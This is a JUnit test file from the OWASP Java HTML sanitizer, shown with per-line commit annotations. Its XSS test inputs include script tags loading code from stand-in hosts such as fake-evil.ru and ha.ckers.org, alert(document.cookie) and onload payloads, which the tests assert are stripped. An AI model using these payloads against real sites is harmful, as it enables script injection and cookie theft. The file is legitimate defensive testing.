1afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com/*
2afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Copyright (c) 2007-2010, Arshan Dabirsiaghi, Jason Li
30f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
4afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * All rights reserved.
50f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
6afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
70f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
8afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
9afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
10afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Neither the name of OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
11afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com *
12afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
13afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
14afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
15afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
16afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
17afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
18afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
19afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
20afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
21afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com */
24afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
25afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.compackage org.owasp.html;
26afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
270f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport java.io.IOException;
28afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.io.InputStreamReader;
29afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.net.URL;
300f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport java.net.URLConnection;
31d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuelimport java.util.regex.Matcher;
32afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.util.regex.Pattern;
33afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
340f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport org.apache.commons.codec.binary.Base64;
35afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
360f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport junit.framework.AssertionFailedError;
37afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.Test;
38afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.TestCase;
39afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.TestSuite;
40afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
414e867904c8295537803c1c8a076e130df5674b58mikesamuel
42afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com/**
43afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * This class tests AntiSamy functionality and the basic policy file which
44afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * should be immune to XSS and CSS phishing attacks.
450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
46afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * @author Arshan Dabirsiaghi
470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
48afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com */
49afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.compublic class AntiSamyTest extends TestCase {
50afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
// Not read by any code visible in this part of the file; presumably gates
// tests that are known to fail -- TODO confirm against the rest of the class.
510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  static final boolean RUN_KNOWN_FAILURES = false;
// When true, testCompareSpeeds returns immediately instead of opening
// network connections to the pages it times.
52036155387b0beda0993f361b73b020b773e58708mikesamuel  static final boolean DISABLE_INTERNETS = false;
530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
544e867904c8295537803c1c8a076e130df5674b58mikesamuel  private static HtmlSanitizer.Policy makePolicy(Appendable buffer) {
550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    final HtmlStreamRenderer renderer = HtmlStreamRenderer.create(
560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        buffer,
570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        new Handler<IOException>() {
580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          public void handle(IOException ex) {
590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            AssertionFailedError failure = new AssertionFailedError();
600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            failure.initCause(ex);
610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            throw failure;
620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          }
630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        },
640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        new Handler<String>() {
650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          public void handle(String errorMessage) {
660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            fail(errorMessage);
670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          }
680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        });
690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
704e867904c8295537803c1c8a076e130df5674b58mikesamuel    return new HtmlPolicyBuilder()
714e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowElements(
724e867904c8295537803c1c8a076e130df5674b58mikesamuel            "a", "b", "br", "div", "font", "i", "img", "input", "li",
734e867904c8295537803c1c8a076e130df5674b58mikesamuel            "ol", "p", "span", "td", "ul")
74846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("checked", "type").onElements("input")
75846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("color").onElements("font")
76846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("href").onElements("a")
77846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("src").onElements("img")
78846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("class", "id", "title").globally()
79846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("char").matching(
804e867904c8295537803c1c8a076e130df5674b58mikesamuel            new AttributePolicy() {
814e867904c8295537803c1c8a076e130df5674b58mikesamuel              public String apply(
824e867904c8295537803c1c8a076e130df5674b58mikesamuel                  String elementName, String attributeName, String value) {
834e867904c8295537803c1c8a076e130df5674b58mikesamuel                return value.length() == 1 ? value : null;
840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel              }
85846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel            }).onElements("td")
864e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowStandardUrlProtocols()
874e867904c8295537803c1c8a076e130df5674b58mikesamuel        .requireRelNofollowOnLinks()
884e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowStyling()
894e867904c8295537803c1c8a076e130df5674b58mikesamuel        .build(renderer);
900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
924e867904c8295537803c1c8a076e130df5674b58mikesamuel  private static String sanitize(String html) {
930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    StringBuilder sb = new StringBuilder();
940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
954e867904c8295537803c1c8a076e130df5674b58mikesamuel    HtmlSanitizer.sanitize(html, makePolicy(sb));
960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    return sb.toString();
980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  private static final String[] BASE64_BAD_XML_STRINGS = new String[] {
1010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // first string is
1020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // "<a - href=\"http://www.owasp.org\">click here</a>"
1030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "PGEgLSBocmVmPSJodHRwOi8vd3d3Lm93YXNwLm9yZyI+Y2xpY2sgaGVyZTwvYT4=",
1040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // the rest are randomly generated 300 byte sequences which generate
1050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // parser errors, turned into Strings
1060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "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",
1120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "mqBEVbNnL929CUA3sjkOmPB5dL0/a0spq8LgbIsJa22SfP580XduzUIKnCtdeC9TjPB/GEPp/LvEUFaLTUgPDQQGu3H5UCZyjVTAMHl45me/0qISEf903zFFqW5Lk3TS6iPrithqMMvhdK29Eg5OhhcoHS+ALpn0EjzUe86NywuFNb6ID4o8aF/ztZlKJegnpDAm3JuhCBauJ+0gcOB8GNdWd5a06qkokmwk1tgwWat7cQGFIH1NOvBwRMKhD51MJ7V28806a3zkOVwwhOiyyTXR+EcDA/aq5acX0yailLWB82g/2GR/DiaqNtusV+gpcMTNYemEv3c/xLkClJc29DSfTsJGKsmIDMqeBMM7RRBNinNAriY9iNX1UuHZLr/tUrRNrfuNT5CvvK1K",
1130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "IMcfbWZ/iCa/LDcvMlk6LEJ0gDe4ohy2Vi0pVBd9aqR5PnRj8zGit8G2rLuNUkDmQ95bMURasmaPw2Xjf6SQjRk8coIHDLtbg/YNQVMabE8pKd6EaFdsGWJkcFoonxhPR29aH0xvjC4Mp3cJX3mjqyVsOp9xdk6d0Y2hzV3W/oPCq0DV03pm7P3+jH2OzoVVIDYgG1FD12S03otJrCXuzDmE2LOQ0xwgBQ9sREBLXwQzUKfXH8ogZzjdR19pX9qe0rRKMNz8k5lqcF9R2z+XIS1QAfeV9xopXA0CeyrhtoOkXV2i8kBxyodDp7tIeOvbEfvaqZGJgaJyV8UMTDi7zjwNeVdyKa8USH7zrXSoCl+Ud5eflI9vxKS+u9Bt1ufBHJtULOCHGA2vimkU",
1140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "AqC2sr44HVueGzgW13zHvJkqOEBWA8XA66ZEb3EoL1ehypSnJ07cFoWZlO8kf3k57L1fuHFWJ6quEdLXQaT9SJKHlUaYQvanvjbBlqWwaH3hODNsBGoK0DatpoQ+FxcSkdVE/ki3rbEUuJiZzU0BnDxH+Q6FiNsBaJuwau29w24MlD28ELJsjCcUVwtTQkaNtUxIlFKHLj0++T+IVrQH8KZlmVLvDefJ6llWbrFNVuh674HfKr/GEUatG6KI4gWNtGKKRYh76mMl5xH5qDfBZqxyRaKylJaDIYbx5xP5I4DDm4gOnxH+h/Pu6dq6FJ/U3eDio/KQ9xwFqTuyjH0BIRBsvWWgbTNURVBheq+am92YBhkj1QmdKTxQ9fQM55O8DpyWzRhky0NevM9j",
1150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "qkFfS3WfLyj3QTQT9i/s57uOPQCTN1jrab8bwxaxyeYUlz2tEtYyKGGUufua8WzdBT2VvWTvH0JkK0LfUJ+vChvcnMFna+tEaCKCFMIOWMLYVZSJDcYMIqaIr8d0Bi2bpbVf5z4WNma0pbCKaXpkYgeg1Sb8HpKG0p0fAez7Q/QRASlvyM5vuIOH8/CM4fF5Ga6aWkTRG0lfxiyeZ2vi3q7uNmsZF490J79r/6tnPPXIIC4XGnijwho5NmhZG0XcQeyW5KnT7VmGACFdTHOb9oS5WxZZU29/oZ5Y23rBBoSDX/xZ1LNFiZk6Xfl4ih207jzogv+3nOro93JHQydNeKEwxOtbKqEe7WWJLDw/EzVdJTODrhBYKbjUce10XsavuiTvv+H1Qh4lo2Vx",
1160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "O900/Gn82AjyLYqiWZ4ILXBBv/ZaXpTpQL0p9nv7gwF2MWsS2OWEImcVDa+1ElrjUumG6CVEv/rvax53krqJJDg+4Z/XcHxv58w6hNrXiWqFNjxlu5RZHvj1oQQXnS2n8qw8e/c+8ea2TiDIVr4OmgZz1G9uSPBeOZJvySqdgNPMpgfjZwkL2ez9/x31sLuQxi/FW3DFXU6kGSUjaq8g/iGXlaaAcQ0t9Gy+y005Z9wpr2JWWzishL+1JZp9D4SY/r3NHDphN4MNdLHMNBRPSIgfsaSqfLraIt+zWIycsd+nksVxtPv9wcyXy51E1qlHr6Uygz2VZYD9q9zyxEX4wRP2VEewHYUomL9d1F6gGG5fN3z82bQ4hI9uDirWhneWazUOQBRud5otPOm9",
1170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "C3c+d5Q9lyTafPLdelG1TKaLFinw1TOjyI6KkrQyHKkttfnO58WFvScl1TiRcB/iHxKahskoE2+VRLUIhctuDU4sUvQh/g9Arw0LAA4QTxuLFt01XYdigurz4FT15ox2oDGGGrRb3VGjDTXK1OWVJoLMW95EVqyMc9F+Fdej85LHE+8WesIfacjUQtTG1tzYVQTfubZq0+qxXws8QrxMLFtVE38tbeXo+Ok1/U5TUa6FjWflEfvKY3XVcl8RKkXua7fVz/Blj8Gh+dWe2cOxa0lpM75ZHyz9adQrB2Pb4571E4u2xI5un0R0MFJZBQuPDc1G5rPhyk+Hb4LRG3dS0m8IASQUOskv93z978L1+Abu9CLP6d6s5p+BzWxhMUqwQXC/CCpTywrkJ0RG",
1180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  };
1190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  @Override
1210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  protected void setUp() throws Exception {
1220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    super.setUp();
1230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  @Override
1260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  protected void tearDown() throws Exception {
1270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    super.tearDown();
1280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public static Test suite() {
1310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    TestSuite suite = new TestSuite(AntiSamyTest.class);
1320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    return suite;
1330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testCompareSpeeds() throws Exception {
13671e338dfcc6a93fa5b28c53270e618f6235bba88mikesamuel    if (DISABLE_INTERNETS) { return; }
137c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel
1386d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    long totalTime = 0;
1396d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    long averageTime = 0;
1400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int testReps = 15;
1420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    for (String url : new String[] {
1440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://slashdot.org/", "http://www.fark.com/",
1450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://www.cnn.com/", "http://google.com/",
1460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://www.microsoft.com/en/us/default.aspx",
1470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://deadspin.com/",
1480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        }) {
1490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      URLConnection conn = new URL(url).openConnection();
150d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      String ct = guessCharsetFromContentType(conn.getContentType());
151489a0ec7301a86af8497d24748336db09ca278damikesamuel      InputStreamReader in = new InputStreamReader(conn.getInputStream(), ct);
1520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      StringBuilder out = new StringBuilder();
1530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      char[] buffer = new char[5000];
1540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      int read = 0;
1550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      do {
1560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        read = in.read(buffer, 0, buffer.length);
1570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        if (read > 0) {
1580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          out.append(buffer, 0, read);
1590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        }
1600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      } while (read >= 0);
1610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      in.close();
1630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String html = out.toString();
1650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      System.out.println("About to scan: " + url + " size: " + html.length());
1670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (html.length() > 640000) {
1680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        System.out.println("   -Maximum input size 640000 exceeded. SKIPPING.");
1690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        continue;
1700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
1710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1726d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel      long startTime = 0;
1736d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel      long endTime = 0;
1740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      for (int j = 0; j < testReps; j++) {
1766d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        startTime = System.nanoTime();
1770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize(html);
1786d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        endTime = System.nanoTime();
1790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1806d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        System.out.println(
1816d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel            "    Took " + ((endTime - startTime) / 1000000) + " ms");
1820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        totalTime = totalTime + (endTime - startTime);
1830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
1840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      averageTime = totalTime / testReps;
1860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
1870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1886d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    System.out.println("Total time ms: " + totalTime/1000000L);
1896d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    System.out.println("Average time per rep ms: " + averageTime/1000000L);
1900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
1930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test basic XSS cases.
1940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
195afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
1960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testScriptAttacks() throws Exception {
1970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script");
1980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script");
1990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
2000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script");
2010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script");
2020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
2030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script");
2040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script");
205afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
2070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
208afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload");
2100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload");
211afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert");
2130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert");
214afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe");
